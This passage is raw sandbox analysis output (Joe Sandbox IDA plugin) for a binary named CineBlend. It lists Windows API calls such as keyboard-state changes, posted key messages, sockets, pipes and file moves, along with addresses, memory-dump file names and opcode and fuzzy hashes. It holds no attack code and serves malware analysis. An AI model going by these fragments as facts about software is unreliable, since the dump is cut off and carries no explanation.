                                            • Part of subcall function 00BA4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA43AD
                                            • Part of subcall function 00BA4393: GetCurrentThreadId.KERNEL32 ref: 00BA43B4
                                            • Part of subcall function 00BA4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00BA2F00), ref: 00BA43BB
                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BD2D7F
                                            • Part of subcall function 00BAF292: Sleep.KERNEL32 ref: 00BAF30A
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                          • String ID:
                                          • API String ID: 4196846111-0
                                          • Opcode ID: ac75178f1aed84738adb3b5d6053c189599afde99e40886f56a55c3e37f94410
                                          • Instruction ID: 90c2b9bc2ee3acd92e8ea169a9bf712598eb7f3085a1ff1ed19c86b1d5d9e29b
                                          • Opcode Fuzzy Hash: ac75178f1aed84738adb3b5d6053c189599afde99e40886f56a55c3e37f94410
                                          • Instruction Fuzzy Hash: 37718375E00205AFCB10DF64C885AAEB7F5EF58310F1484AAE816EB351EB34EE41CB90
                                          APIs
                                          • IsWindow.USER32(00000000), ref: 00BD8992
                                          • IsWindowEnabled.USER32(00000000), ref: 00BD899E
                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00BD8A79
                                          • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00BD8AAC
                                          • IsDlgButtonChecked.USER32(?,00000000), ref: 00BD8AE4
                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 00BD8B06
                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BD8B1E
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                          • String ID:
                                          • API String ID: 4072528602-0
                                          • Opcode ID: 0f85524dca226c75a9def9824ecec3f467c8e4786d4a8ffad3732b1605b39340
                                          • Instruction ID: f56a6cfcdbfc2eda1af37e83d5cbbba7e1422eb34d5be1808606db338d561be2
                                          • Opcode Fuzzy Hash: 0f85524dca226c75a9def9824ecec3f467c8e4786d4a8ffad3732b1605b39340
                                          • Instruction Fuzzy Hash: AB719C74604209AFEB219F54C894FBAFBF9EF09301F1414DBE885673A1EB31A981DB51
                                          APIs
                                          • GetParent.USER32(?), ref: 00BAB8C0
                                          • GetKeyboardState.USER32(?), ref: 00BAB8D5
                                          • SetKeyboardState.USER32(?), ref: 00BAB936
                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00BAB964
                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00BAB983
                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00BAB9C4
                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00BAB9E7
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: e2610e0c5b1f1d8abeb7040f5d3947c2e70a763de0897aa287e43b9a80b0564a
                                          • Instruction ID: 8d4279e728317e5f29b04de1f43a6dd3b94c8932ce2992623c60beeb78edf7f6
                                          • Opcode Fuzzy Hash: e2610e0c5b1f1d8abeb7040f5d3947c2e70a763de0897aa287e43b9a80b0564a
                                          • Instruction Fuzzy Hash: 3C51AEA050C6D53EFB3642288855FBABEE99B07704F0884C9E1E5468D3D7A8AD94D760
                                          APIs
                                          • GetParent.USER32(00000000), ref: 00BAB6E0
                                          • GetKeyboardState.USER32(?), ref: 00BAB6F5
                                          • SetKeyboardState.USER32(?), ref: 00BAB756
                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BAB782
                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BAB79F
                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BAB7DE
                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BAB7FF
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: 24275103ef4df82ef3044b149792bb5e9a358944cba943716c79b86a57f09b8a
                                          • Instruction ID: d94a82a6922aaf9c9f6fd3a6b69d17218bc2a6e48187627f563652c6f724358c
                                          • Opcode Fuzzy Hash: 24275103ef4df82ef3044b149792bb5e9a358944cba943716c79b86a57f09b8a
                                          • Instruction Fuzzy Hash: 0E51D1A090C6D53DFB3682288C55F76BEE9AB47704F0884C9E0E54A8D3D3D4EC94E760
                                          APIs
                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00B75F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00B757E3
                                          • __fassign.LIBCMT ref: 00B7585E
                                          • __fassign.LIBCMT ref: 00B75879
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00B7589F
                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,00B75F16,00000000,?,?,?,?,?,?,?,?,?,00B75F16,?), ref: 00B758BE
                                          • WriteFile.KERNEL32(?,?,00000001,00B75F16,00000000,?,?,?,?,?,?,?,?,?,00B75F16,?), ref: 00B758F7
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID:
                                          • API String ID: 1324828854-0
                                          • Opcode ID: 74b54ac76e3decb4ab1322e4206fc59686ebef343f3ec94b29d138c1fbf1ee8f
                                          • Instruction ID: d04c0647789a19c5c9cc01401ece03ea48ec2034054ebf01d220b37cf5ab1818
                                          • Opcode Fuzzy Hash: 74b54ac76e3decb4ab1322e4206fc59686ebef343f3ec94b29d138c1fbf1ee8f
                                          • Instruction Fuzzy Hash: D451B671900649DFDB20CFA8D885BEEBBF8FF09310F14815AE969E7291D770A941CB61
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 00B630BB
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00B630C3
                                          • _ValidateLocalCookies.LIBCMT ref: 00B63151
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00B6317C
                                          • _ValidateLocalCookies.LIBCMT ref: 00B631D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 8e801ed08a85fd4c6d8ac3aa8adc8e9955af7a3a27ba9a927c6cdabac466a8e5
                                          • Instruction ID: 432e0c2f0e5d6eb34d9f7c5a2a51176de29c27950d86c361cbd4674c1f8f3566
                                          • Opcode Fuzzy Hash: 8e801ed08a85fd4c6d8ac3aa8adc8e9955af7a3a27ba9a927c6cdabac466a8e5
                                          • Instruction Fuzzy Hash: A4419374A002089BCF10DF68C885A9EBBF5EF45B24F1481D5E8156B392D739DB45CB91
                                          APIs
                                            • Part of subcall function 00BC3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00BC3AD7
                                            • Part of subcall function 00BC3AAB: _wcslen.LIBCMT ref: 00BC3AF8
                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00BC1B6F
                                          • WSAGetLastError.WSOCK32 ref: 00BC1B7E
                                          • WSAGetLastError.WSOCK32 ref: 00BC1C26
                                          • closesocket.WSOCK32(00000000), ref: 00BC1C56
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 2675159561-0
                                          • Opcode ID: 6ca952493da2e13671fed5fa3241ef5ec4e962279cda4cb4f71624816c43bd70
                                          • Instruction ID: 4ded29f227fd79da032e816b010585036d9d0ccaa19f32bcc43476edea0bb96e
                                          • Opcode Fuzzy Hash: 6ca952493da2e13671fed5fa3241ef5ec4e962279cda4cb4f71624816c43bd70
                                          • Instruction Fuzzy Hash: 2B41B231600114AFDB109F28C885FAABBE9EF46324F14849DF855AB292DB71ED41CBE1
                                          APIs
                                            • Part of subcall function 00BAE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BAD7CD,?), ref: 00BAE714
                                            • Part of subcall function 00BAE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BAD7CD,?), ref: 00BAE72D
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00BAD7F0
                                          • MoveFileW.KERNEL32(?,?), ref: 00BAD82A
                                          • _wcslen.LIBCMT ref: 00BAD8B0
                                          • _wcslen.LIBCMT ref: 00BAD8C6
                                          • SHFileOperationW.SHELL32(?), ref: 00BAD90C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 3164238972-1173974218
                                          • Opcode ID: ec481cd770174bcb6bec11bfb2cdaf1db3c91624fc5a1838a4a22e74e01c27f1
                                          • Instruction ID: f6bfbdb563d06f5924f1161e00c758984ff80d0dfa792bf1adce475a454f3af5
                                          • Opcode Fuzzy Hash: ec481cd770174bcb6bec11bfb2cdaf1db3c91624fc5a1838a4a22e74e01c27f1
                                          • Instruction Fuzzy Hash: 8D4146719092189EDF12EFA4D985BDE77F8EF19340F1004E6A546EB141EB39E788CB50
                                          APIs
                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00BD38B8
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BD38EB
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BD3920
                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00BD3952
                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00BD397C
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BD398D
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BD39A7
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID:
                                          • API String ID: 2178440468-0
                                          • Opcode ID: fa8534c31b640cefcd72749a9b75322aa3aa65a941a0063add1d1004d529c2ea
                                          • Instruction ID: d861d5b86aa0059a76a989c1d11464ef2b527c2de68647b77d0dfcfc7968df4e
                                          • Opcode Fuzzy Hash: fa8534c31b640cefcd72749a9b75322aa3aa65a941a0063add1d1004d529c2ea
                                          • Instruction Fuzzy Hash: 73313634705251AFDB218F48DC94F68B7E1FB8AB10F1441A6F5418B2B2DB75AD44DB42
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA80D0
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA80F6
                                          • SysAllocString.OLEAUT32(00000000), ref: 00BA80F9
                                          • SysAllocString.OLEAUT32(?), ref: 00BA8117
                                          • SysFreeString.OLEAUT32(?), ref: 00BA8120
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00BA8145
                                          • SysAllocString.OLEAUT32(?), ref: 00BA8153
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: 58f21caf74f244159add349869dc8a9a9d3fba5e58c6602201399677654e2b38
                                          • Instruction ID: 76be82bd9e179965f63b7acf948eb0e8fa8b250b9530ff19d757d5fe788310d6
                                          • Opcode Fuzzy Hash: 58f21caf74f244159add349869dc8a9a9d3fba5e58c6602201399677654e2b38
                                          • Instruction Fuzzy Hash: A321A972605219BFDF10DFA8CC84CBB73ECEB0A3607048465F905EB290EA70DC468760
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA81A9
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA81CF
                                          • SysAllocString.OLEAUT32(00000000), ref: 00BA81D2
                                          • SysAllocString.OLEAUT32 ref: 00BA81F3
                                          • SysFreeString.OLEAUT32 ref: 00BA81FC
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00BA8216
                                          • SysAllocString.OLEAUT32(?), ref: 00BA8224
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: 526c1474e92b67893f4f750f965826a2ef47f3df7ac760685730a5abfb476578
                                          • Instruction ID: 3cbafa2d06bb31d50ed3f84edba9ea2b73c618982a149cb8cfb2c4ed308e6259
                                          • Opcode Fuzzy Hash: 526c1474e92b67893f4f750f965826a2ef47f3df7ac760685730a5abfb476578
                                          • Instruction Fuzzy Hash: 4F217471605204BF9B10AFA8DC89DBA77ECFB4A3607048165F905DB2A0EE74EC41CB64
                                          APIs
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00BB0E99
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BB0ED5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CreateHandlePipe
                                          • String ID: nul
                                          • API String ID: 1424370930-2873401336
                                          • Opcode ID: 3fa107e5c1d80cd02326e60174df17cf8071ba85ad17ce110d3e5270e7a2f093
                                          • Instruction ID: 2f48cc49798fb1435f437e1fccd5c6d63b93a4df0ba9c311533af24c6ec4c1b8
                                          • Opcode Fuzzy Hash: 3fa107e5c1d80cd02326e60174df17cf8071ba85ad17ce110d3e5270e7a2f093
                                          • Instruction Fuzzy Hash: 8A212F70A10309ABDB20AF65D845AFB77E8EF55720F204A99FCA5971D0E7B0D940DB50
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00BB0F6D
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BB0FA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CreateHandlePipe
                                          • String ID: nul
                                          • API String ID: 1424370930-2873401336
                                          • Opcode ID: f92654fe374d94ef4dffb9b7d224a61705c00ab4c0886fb7fec7f6ed9e4da465
                                          • Instruction ID: 6a6915601598974e3fcbb0448e8c9f747e1c354ef8dcd4209867fc1c2fa26294
                                          • Opcode Fuzzy Hash: f92654fe374d94ef4dffb9b7d224a61705c00ab4c0886fb7fec7f6ed9e4da465
                                          • Instruction Fuzzy Hash: 33214C716043459BDB30AF688C54AFAB7E8FF55724F600A59F8E1E32D0EBB09990DB50
                                          APIs
                                            • Part of subcall function 00B47873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B478B1
                                            • Part of subcall function 00B47873: GetStockObject.GDI32(00000011), ref: 00B478C5
                                            • Part of subcall function 00B47873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B478CF
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BD4BB0
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BD4BBD
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BD4BC8
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BD4BD7
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BD4BE3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: c8b95230c314fd271f4003b3814dcd2698fde80913359ceccb2431f3c57ba492
                                          • Instruction ID: 5cfbdc1a5f38564ab52719bf503efcc1bde650019c6b111d9fc725deb1cf0dfd
                                          • Opcode Fuzzy Hash: c8b95230c314fd271f4003b3814dcd2698fde80913359ceccb2431f3c57ba492
                                          • Instruction Fuzzy Hash: 921193B2150219BEEF118E65CC85EEBBFADEF08758F014112B658A6190DB72DC21DBA4
                                          APIs
                                            • Part of subcall function 00B7DB23: _free.LIBCMT ref: 00B7DB4C
                                          • _free.LIBCMT ref: 00B7DBAD
                                            • Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
                                            • Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60
                                          • _free.LIBCMT ref: 00B7DBB8
                                          • _free.LIBCMT ref: 00B7DBC3
                                          • _free.LIBCMT ref: 00B7DC17
                                          • _free.LIBCMT ref: 00B7DC22
                                          • _free.LIBCMT ref: 00B7DC2D
                                          • _free.LIBCMT ref: 00B7DC38
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                          • Instruction ID: 1f149f7ce85518ac7d487d5d689a838c4a7d1606e4784bb7b8c7875d471d4f36
                                          • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                          • Instruction Fuzzy Hash: E3111C72541B04EAD631BBB0CC07FCB77ECAF14740F418CE9B2ADAA252DA75B6098650
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00BAE328
                                          • LoadStringW.USER32(00000000), ref: 00BAE32F
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00BAE345
                                          • LoadStringW.USER32(00000000), ref: 00BAE34C
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BAE390
                                          Strings
